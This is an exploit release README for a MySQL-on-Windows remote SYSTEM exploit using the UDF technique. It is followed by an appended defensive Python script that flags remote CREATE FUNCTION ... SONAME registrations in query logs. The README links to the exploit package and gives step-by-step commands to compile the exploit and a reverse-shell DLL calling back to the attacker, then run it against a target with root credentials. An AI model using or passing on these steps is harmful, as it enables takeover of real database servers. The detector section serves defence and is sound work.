***
FARLiGHT ELiTE HACKERS LEGACY R3L3ASE
***

Attached is the MySQL Windows Remote Exploit (post-auth, udf
technique) including the previously released mass scanner.
The exploit is mirrored at the farlight website http://www.farlight.org.

Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday
All owned By Kingcope

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/23073.tar.gz

Installation Instructions
=============================

1. Install mysql client libraries and headers (UNIX)
RedHat based (e.g. CentOS):
yum install mysql mysql-devel

2. Compile the standalone exploit
issue commands:
gcc mysqljackpot.c -o mysqljackpot -L/usr/lib/mysql -lmysqlclient

3. Compile the reverse shell payload (this is required!)
required because the connect back ip and port are hardcoded in the dll:
use mingw on windows or wine
change REVERSEIP and REVERSEPORT to suit your needs. If you change REVERSEPORT you have
to change the port in mysqljackpot.c too (default port: 443).
issue commands:
set PATH=%PATH%;c:\MinGW\bin\
gcc -c payload.c
gcc -shared -o payload.dll payload.o -lws2_32
copy the payload.dll into the mysqljackpot exploit folder

4. Run The Exploit
./mysqljackpot -u root -p "" -t 99.99.99.99
A valid database admin user and his password are required
for the exploit to work properly.
This exploit is especially useful when used in connection
to a MySQL login scanner, see scanner/README.mysql inside this package.
Be sure to have the firewall open on the desired reverse port
on the attacking machine.

5. Enjoy your SYSTEM Shell!!!


Yours Sincerely,

-- Kingcope
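
A defender-side check for the post-auth UDF technique named above, as an added example that is not part of the original README or of the package it describes: it scans a MySQL general query log for `CREATE FUNCTION ... SONAME` statements (the documented statement that registers a loadable function) and flags those issued from remote sessions with a library that is not on an allow-list. The log layout, sample lines, function and library names and the allow-list are constructed assumptions, and the general query log must be enabled for such lines to exist.

```python
import re

# Constructed, simplified general-query-log lines (assumed columns: timestamp,
# connection id, command, argument). Not captured from a real server.
SAMPLE_LOG = """\
2012-12-01T10:00:00Z    11 Connect  app@localhost on shop
2012-12-01T10:00:01Z    11 Query    SELECT id FROM orders WHERE id = 7
2012-12-01T10:02:10Z    12 Connect  root@203.0.113.7 on mysql
2012-12-01T10:02:11Z    12 Query    CREATE FUNCTION example_fn RETURNS STRING SONAME 'example.dll'
2012-12-01T10:02:12Z    12 Query    SELECT example_fn('x')
2012-12-01T10:05:00Z    13 Connect  root@localhost on mysql
2012-12-01T10:05:02Z    13 Query    CREATE FUNCTION approved_fn RETURNS INTEGER SONAME 'approved.dll'
"""

LINE = re.compile(r"^\S+\s+(\d+)\s+(Connect|Query)\s+(.*)$")
CONNECT = re.compile(r"^(\S+)@(\S+)")
UDF = re.compile(
    r"CREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+`?(\w+)`?\s+RETURNS\s+\w+"
    r"\s+SONAME\s+'([^']+)'", re.I)
LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}

def find_udf_registrations(log_text, approved_libraries=()):
    """Return one finding per CREATE FUNCTION ... SONAME statement in the log."""
    approved = {name.lower() for name in approved_libraries}  # Windows names: case-insensitive
    sessions = {}   # connection id -> (user, host) taken from the Connect line
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        conn_id, command, arg = m.groups()
        if command == "Connect":
            who = CONNECT.match(arg)
            if who:
                sessions[conn_id] = who.groups()
            continue
        udf = UDF.search(arg)
        if udf:
            # A session with no Connect line in the log is treated as remote.
            user, host = sessions.get(conn_id, ("?", "?"))
            library = udf.group(2)
            findings.append({
                "conn": conn_id, "user": user, "host": host,
                "function": udf.group(1), "library": library,
                "remote": host not in LOCAL_HOSTS,
                "approved": library.lower() in approved})
    return findings

def high_risk(findings):
    """Remote sessions that registered a library outside the allow-list."""
    return [f for f in findings if f["remote"] and not f["approved"]]
```

Calling `high_risk(find_udf_registrations(SAMPLE_LOG, ["approved.dll"]))` on the constructed log returns the single registration made by the remote `root` session.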